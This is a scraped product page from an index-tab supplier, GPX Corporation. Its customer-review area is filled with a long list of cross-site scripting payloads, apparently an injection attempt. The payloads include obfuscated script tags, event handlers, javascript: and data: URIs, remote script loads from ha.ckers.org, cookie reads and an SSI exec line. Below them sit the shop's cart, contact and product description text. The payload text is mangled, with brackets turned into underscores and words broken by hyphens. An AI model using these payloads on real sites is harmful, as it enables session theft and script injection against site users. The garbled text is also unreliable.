t&lpar;1&rpar;"__button_
_div onmouseover='alert&lpar;1&rpar;'_DIV_/div_
_iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100-
%" onmouseover="prompt(1)"_
_a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;&q-
uot;_X_/a_
_embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trun-
k/misc/pdf/helloworld_js_X.pdf"_
_object data="http://corkami.googlecode.com/svn/!svn/bc/480/tru-
nk/misc/pdf/helloworld_js_X.pdf"_
_var onmouseover="prompt(1)"_On Mouse Over_/var_
_a href=javascript&colon;alert&lpar;document&period-
;cookie&rpar;_Click Here_/a_
_img src="/" =_=" title="onerror='prompt(1)'"_
_%_!--'%__script_alert(1);_/script --_
_script src="data:text/javascript,alert(1)"__/script_
_iframe/src \/\/onload = prompt(1)
_iframe/onreadystatechange=alert(1)
_svg/onload=alert(1)
_input value=___iframe/src=javascript:confirm(1)
_input type="text" value=`` _div/onmouseover='alert(1)'_X_/div_
http://www._script_alert(1)_/script .com
_iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v-
&NewLine;&Tab;&Tab;&Tab;a&NewLine;&T-
ab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Ta-
b;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab-
;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;-
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&-
NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta-
b;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab-
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&-
;NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&T-
ab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewL-
ine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&a-
mp;Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&am-
p;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;-
&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&-
amp;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta-
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&am-
p;NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&-
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&a-
mp;Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&am-
p;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;-
&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;-
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T-
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&am-
p;Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&-
;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&-
amp;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta-
b;&Tab;%29__/iframe_
_svg__script ?_alert(1)
_iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&-
Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&-
;Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29-
__/iframe_
_img src=`xx:xx`onerror=alert(1)_
_meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/_
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always_
_svg contentScriptType=text/vbs__script_MsgBox+1
_a href="data:text/html;base64_,_svg/onload=\u0061&#x6-
C;&#101%72t(1)_"_X_/a
_iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u007-
4('\u0061') worksinIE_
_script_~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')_/script U+
_script/src="data&colon;text%2Fj\u0061v\u0061sc-
ript,\u0061lert('\u0061')"__/script a=\u0061 & /=%2F
_script/src=data&colon;text/j\u0061v\u0061&#115&-
amp;#99&#114&#105&#112&#116,\u0061%6C%65%72%-
74(/XSS/)__/script
_object data=javascript&colon;\u0061&#x6C;&#101%72t(1)_<-
br /> _script_+-+-1-+-+alert(1)_/script_
_body/onload=&lt;!--&gt;&#10alert(1)_
_script itworksinallbrowsers_/*_script* */alert(1)_/script
_img src ?itworksonchrome?\/onerror = alert(1)
_svg__script_//&NewLine;confirm(1);_/script _/svg_
_svg__script onlypossibleinopera:-)_ alert(1)
_a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)_Click-
Me
_script x_ alert(1) _/script 1=2
_div/onmouseover='alert(1)'_ style="x:"_
_--`_img/src=` onerror=alert(1)_ --!_
_script/src=&#100&#97&#116&#97:text/&#x6-
a&#x61&#x76&#x61&#x73&#x63&#x72&-
#x69&#x000070&#x074,&#x0061;&#x06c;&#x00-
65;&#x00000072;&#x00074;(1)__/script_
_div style="xg-p:absolute;top:0;left:0;width:100%;height:100-
%" onmouseover="prompt(1)" onclick="alert(1)"_x_/button_
"__img src=x onerror=window.open('https://www.google.com/');_
_form__button formaction=javascript&colon;alert(1)_CLICKME
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+__/ob-
ject_
_iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%7-
2%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"__/iframe_
_a href="data:text/html;blabla,&#60&#115&#99&a-
mp;#114&#105&#112&#116&#32&#115&#114-
&#99&#61&#34&#104&#116&#116&#112-
&#58&#47&#47&#115&#116&#101&#114-
&#110&#101&#102&#97&#109&#105&#1-
08&#121&#46&#110&#101&#116&#47&#-
102&#111&#111&#46&#106&#115&#34&-
#62&#60&#47&#115&#99&#114&#105&#-
112&#116&#62&#8203"_Click Me_/a_
_SCRIPT_String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)_/SCRIPT_
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.f-
romCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83-
))//”;alert(String.fromCharCode(88,83,83))//–__/SCRIPT_”_’__-
SCRIPT_alert(String.fromCharCode(88,83,83))_/SCRIPT_
_IMG “””__SCRIPT_alert(“XSS”)_/SCRIPT_”_
_IMG SRC=javascript:alert(String.fromCharCode(88,83,83))_
_IMG SRC=”jav ascript:alert(‘XSS’);”_
_IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”_
__SCRIPT_alert(“XSS”);//__/SCRIPT_
%253cscript%253ealert(1)%253c/script%253e
“__s”%2b”cript_alert(document.cookie)_/script_
foo_script_alert(1)_/script_
_scr_script_ipt_alert(1)_/scr_/script_ipt_
_IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99-
;&#114;&#105;&#112;&#116;&#58;&#97;&-
amp;#108;&#101;&#114;&#116;&#40;&#39;&am-
p;#88;&#83;&#83;&#39;&#41;_
_IMG SRC=&#0000106&#0000097&#0000118&#0000097&-
;#0000115&#0000099&#0000114&#0000105&#000011-
2&#0000116&#0000058&#0000097&#0000108&#0-
000101&#0000114&#0000116&#0000040&#0000039&a-
mp;#0000088&#0000083&#0000083&#0000039&#0000-
041_
_IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&a-
mp;#x72&#x69&#x70&#x74&#x3A&#x61&#x6-
C&#x65&#x72&#x74&#x28&#x27&#x58&-
#x53&#x53&#x27&#x29_
_BODY BACKGROUND=”javascript:alert(‘XSS’)”_
_BODY ONLOAD=alert(‘XSS’)_
_INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”_
_IMG SRC=”javascript:alert(‘XSS’)”
_iframe src=http://ha.ckers.org/scriptlet.html _
javascript:alert("hellox worldss")
_img src="javascript:alert('XSS');"_
_img src=javascript:alert(&quot;XSS&quot;)_
_"';alert(String.fromCharCode(88,83,83))//\';alert(-
String.fromCharCode(88,83,83))//";alert(String.fromChar-
Code(88,83,83))//\";alert(String.fromCharCode(88,83,83)-
)//--__/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88-
,83,83))_/SCRIPT_
_META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydC-
gnWFNTJyk8L3NjcmlwdD4K"_
_IFRAME SRC="javascript:alert('XSS');"__/IFRAME_
_EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0-
dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My-
5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5-
L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhl-
aWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxl-
cnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"__/EMBED_
_SCRIPT a="_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_" '' SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT "a='_'" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_'_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT_document.write("_SCRI");_/SCRIPT_PT SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
__SCRIPT_alert("XSS");//__/SCRIPT_
_"';alert(String.fromCharCode(88,83,83))//\';alert(-
String.fromCharCode(88,83,83))//";alert(String.fromChar-
Code(88,83,83))//\";alert(String.fromCharCode(88,83,83)-
)//--__/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88-
,83,83))_/SCRIPT_
';alert(String.fromCharCode(88,83,83))//\';alert(String.-
fromCharCode(88,83,83))//";alert(String.fromCharCode(88-
,83,83))//\";alert(String.fromCharCode(88,83,83))//--__-
/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88,83,83)-
)_?/SCRIPT_&submit.x=27&submit.y=9&cmd=search
_script_alert("hellox worldss")_/script_&safe=high&cx=006665157904466-
893121:su_tzknyxug&cof=FORID:9#510
_script_alert("XSS");_/script_&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert-
%2?8String.fromCharCode(88,83,83))//";alert(String.from-
CharCode?(88,83,83))//\";alert(String.fromCharCode(88,8-
3,83)%?29//--__/SCRIPT_"_'__SCRIPT_alert(String.fromCha-
rCode(88,83%?2C83))_/SCRIPT_&submit-frmGoogleWeb=Web+Sea-
rch
_h1__font color=blue_hellox worldss_/h1_
_BODY ONLOAD=alert('hellox worldss')_
_input onfocus=write(XSS) autofocus_
_input onblur=write(XSS) autofocus__input autofocus_
_body onscroll=alert(XSS)__br__br__br__br__br__br_..._br__br__br__-
br__input autofocus_
_form__button formaction="javascript:alert(XSS)"_lol
_!--_img src="--__img src=x onerror=alert(XSS)//"_
_![__img src="]__img src=x onerror=alert(XSS)//"_
_style__img src="_/style__img src=x onerror=alert(XSS)//"_
_? foo="__script_alert(1)_/script_"_
_! foo="__script_alert(1)_/script_"_
_/ foo="__script_alert(1)_/script_"_
_? foo="__x foo='?__script_alert(1)_/script_'_"_
_! foo="[[[Inception]]"__x foo="]foo__script_alert(1)_/script_"_
_% foo__x foo="%__script_alert(123)_/script_"_
_div style="font-family:'foo&#10;;color:red;';"_LOL-

LOL_style_*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*I-
E,Safari*[0]/color:green;color:bl/*IE*/ue;}_/style_
_script_({0:#0=alert/#0#/#0#(0)})_/script_
_svg xmlns="http://www.w3.org/2000/svg"_LOL_script_aler-
t(123)_/script__/svg_
&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt-
;/SCRIPT&gt;
\\";alert('XSS');//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"-
;XSS\");&lt;/SCRIPT&gt;
&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;<-
br /> &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&am-
p;gt;
&lt;BODY ONLOAD=alert('XSS')&gt;
&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt-
;
&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt-
;
&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;<-
br /> &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scrip-
tlet&#46;html\"&gt;&lt;/LAYER&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;-

&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&-
amp;#46;css\"&gt;
&lt;STYLE&gt;@import'http&#58;//ha&#46;c-
kers&#46;org/xss&#46;css';&lt;/STYLE&gt;
&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#-
46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
&lt;STYLE&gt;BODY{-moz-binding&#58;url(\&quo-
t;http&#58;//ha&#46;ckers&#46;org/xssmoz&#46-
;xml#xss\")}&lt;/STYLE&gt;
&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt-
;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&g-
t;
&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"-
&gt;
˛scriptualert(EXSSE)˛/scriptu
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"-
;&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwd-
D5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\&q-
uot;
&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&-
amp;lt;/IFRAME&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&-
amp;lt;/FRAMESET&gt;
&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&am-
p;gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&am-
p;gt;
&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\-
006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\-
006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053-
\0027\0029'\0029\"&gt;
&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;aler-
t(\"XSS\")';&lt;/STYLE&gt;
&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\&qu-
ot;&gt;
&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&-
;gt;
exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"-
;XSS\"))'&gt;
&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&-
lt;/STYLE&gt;
&lt;STYLE&gt;&#46;XSS{background-image&#-
58;url(\"javascript&#058;alert('XSS')\");}&-
;lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;u-
rl(\"javascript&#058;alert('XSS')\")}&lt;/-
STYLE&gt;
&lt;!--&#91;if gte IE 4&#93;&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&g-
t;
&lt;!&#91;endif&#93;--&gt;
&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&g-
t;
&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scri-
ptlet&#46;html\"&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&a-
mp;gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJEC-
T&gt;
&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&a-
mp;#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED-
&gt;
&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczp-
zdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My-
5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5-
L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhl-
aWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxl-
cnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED-
&gt;
a=\"get\";
b=\"URL(\\"\";
c=\"javascript&#058;\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#4-
6;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&-
amp;gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&-
gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&-
#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;-
CDATA&#91;cript&#58;alert('XSS');\"&gt;&-
;#93;&#93;&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;-
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&g-
t;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/-
B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;-

&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\&qu-
ot;&gt;
&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&a-
mp;gt;\"&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&a-
mp;#46;jpg\"&gt;&lt;/SCRIPT&gt;
&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;-
js&gt;&lt;/SCRIPT&gt;'\

Rating: 5 of 5 Stars! [5 of 5 Stars!]
Back Write Review

Add to Cart

Shopping Cart more
0 items

For Assistance Call 813.884.1514

Notifications more
Notify me of updates to Design Your Own Index Tabs
7 Tabs per Set


  Support
Templates
Support Blog
Partners
Links
Credit Application

  Help Videos
Determine Tab Direction





Catalog | Shipping & Returns | About Us | Contact Us | Privacy Notice
Remittance Address: GPX Corporation • 5335 Emory Drive • Wesley Chapel, FL 33543
Physical Address: GPX Corporation • 34234 State Road 54 • Wesley Chapel, FL 33543
Phone: 813-884-1514 • Contact Us

Hassle free, quality index tab and chart divider at extremely low prices to hospitals, accounting and legal firms, the insurance industry, universities and for general office consumption. Our product range includes Avery tab, bottom tab, legal dividers, printable tabs, custom index tabs, binder tab styles including many others. We carry both 'in stock' items as well as Design Your Own Tabs, all online.

Our Index Tab line includes: blank tabs, copier tabs, exhibit tabs, insurance tabs, letter tabs, numeric tabs and Design Your Own Titles tabs. Available in both side and bottom tab construction. Note that we are one of the few manufacturers who produce both side and bottom index tabs.

Our Chart Dividers line includes: Tab dividers and hospital chart dividers for medical record filing and medical record storage.
Chart dividers are available in Standard Sets (premade with standard titles) as well as Individual Standard tabs PLUS Design Your Own Dividers for the Hospitals and Doctors offices who require unique titles.

Fast, secure, online ordering. Follow the links above or you may call 813-884-1514 to inquire about ordering.

Copyright © 2016 GPX Corporation